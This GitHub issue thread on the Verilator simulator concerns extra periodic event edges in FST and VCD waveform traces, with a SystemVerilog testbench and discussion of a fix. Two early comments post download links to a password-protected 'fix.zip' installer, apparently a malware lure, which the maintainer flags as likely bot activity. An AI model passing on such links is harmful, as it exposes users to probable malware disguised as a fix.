### ISSUE TITLE
Fix extra events in traces

### ISSUE THREAD

**Issue by katsui97** [verilator/verilator#5405]
When displaying a variable defined with event in GTKWave, the waveform appears incorrectly.
In the case of:
event Ev_Test;

The timing when using ->Ev_Test; correctly releases the wait with @(Ev_Test).
Is the incorrect waveform due to design intent?
Best regards.

Verilator 5.029 devel rev v5.028-10-ga9635aaa2

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wsnyder** [comment]
That you added then removed a download link makes me suspect this is a bot, please confirm you are human by pasting a screen shot here of the waveform in the viewer.

**Comment by katsui97** [comment]
The waveform has been pasted.

![wave](https://github.com/user-attachments/assets/b2c5e3c9-f945-45e2-982b-069175b8a12b)

**Comment by wsnyder** [comment]
Thanks, the waveform does show the event, so I'm not understanding the issue, can you explain more what's incorrect?

**Comment by katsui97** [comment]
The waveform for the Event should only show a rising edge at the moment when the ->Ev_test is triggered. However, why is it appearing periodically? In commercial simulators like VCS and Xcelium, the rising edge only occurs at the intended timing.

**Comment by wsnyder** [comment]
Ah.  Can you post the example in text form please?

**Comment by katsui97** [comment]
Thank you for your prompt response. I'll send the RTL (testbench) shortly.

Also, while I'm at it, I wanted to mention that the clocking block is being correctly executed in the Reactive region, but it seems that the program instance is not executing in the Reactive region (it behaves the same as a normal module instance).
[test.txt](https://github.com/user-attachments/files/16746785/test.txt)
[counter.txt](https://github.com/user-attachments/files/16746786/counter.txt)

**Comment by katsui97** [comment]
The latest master branch has been checked, but the issue still hasn't been resolved.

**Comment by wsnyder** [comment]
Thanks for the test. Note this only affects FST not VCD.

Attempted fix in #5424 but core dumps on some multithread tests so needs work.

**Comment by katsui97** [comment]
Oh, I was able to confirm that the VCD is displayed correctly with the latest master. Indeed, it hasn’t changed in FST yet. Thank you for your continued consideration.

**Comment by katsui97** [comment]
Oh! With the latest master, I was able to correctly verify the event waveforms in VCD. I remember that previously it was a bit different from FST, and VCD seemed to have issues as well, so it looks like that has been fixed. I also confirmed that FST still hasn't been fixed. I appreciate your continued efforts on this.

**Comment by katsui97** [comment]
Huh, perhaps VCD was displaying the event variables correctly in the waveform for regular module instances. I was testing it simultaneously with program instances, and I might have confused it with the abnormal waveforms from that test.

I checked with the current latest master, and the event variable waveforms are still incorrect in VCD when using program instances. I briefly pointed out the issue where changes are not reflected in the Reactive region with program instances, but it seems that the waveform display in VCD is also incorrect for program instances.

I have attached the test bench and waveforms for your review. Please take a look.
------------------------------------------------------------
![image](https://github.com/user-attachments/assets/7afe87e1-b7f7-4b07-b4f5-1f43821d277d)
------------------------------------------------------------
`timescale 1ns/100ps

module top();

  // VCD or FST Dump
  initial begin
    $dumpfile("wave.dump");
    $dumpvars(0, top);
  end


  bit CLK;

  // Gen Clock
  initial
    forever
    begin
      CLK = ~CLK;
      #10;
    end

  clocking cb @(posedge CLK);
  endclocking


  event Ev_test;

  bit RST_X = 1'b1;

  logic [3:0] r_cnt;
  always_ff @(posedge CLK, negedge RST_X)
    if(~RST_X)
      r_cnt <= '0;
    else
      r_cnt <= 4'(r_cnt + 1'b1);


  initial
  begin
    #12
    RST_X = 1'b0;   
    #15
    RST_X = 1'b1;

    #20;

    forever
    begin
      if(r_cnt == 5)
      begin
        ->Ev_test;
        break;
      end
      @(cb);
      //@(posedge CLK);
    end

    repeat(20)
      @(posedge CLK);

    #10;

    $finish;
  end

  bit det_flag = 1'b0;

  initial
  begin
    forever
    begin
      @(Ev_test);
      det_flag = 1'b1;
    end
  end

  // program instance
  test_prg test_prg(.CLK);

endmodule

program test_prg(
  input logic CLK
);

  event Ev_test_prg;
  bit det_flag_prg = 1'b0;

  initial
  begin
    forever
    begin
      @(posedge CLK);
      if(top.r_cnt == 5)
      begin
        ->Ev_test_prg;
        det_flag_prg = 1'b1;
        break;
      end
    end

    forever
      @(posedge CLK);
  end

endprogram

**Comment by katsui97** [comment]
For waveform output in VCD format, I confirmed that the abnormal periodic event waveforms have been eliminated even for program instances. However, for waveform output in FST format, it appears that there has been no improvement for both module and program instances. Is my understanding correct?

-------------------------------------------------------------
SHA-1: e4ff0909dc84f9ba3c565c396a46534f1f1cb7db
* Tests: Misc test cleanups from Python branch.

**Comment by wsnyder** [comment]
@katsui97 the changes haven't been merged to master as they do not test correctly in multithreaded, they are on that pull request.

**Comment by katsui97** [comment]
I have confirmed that the extra periodic events have been eliminated when outputting waveforms in FST mode. Thank you for your support.
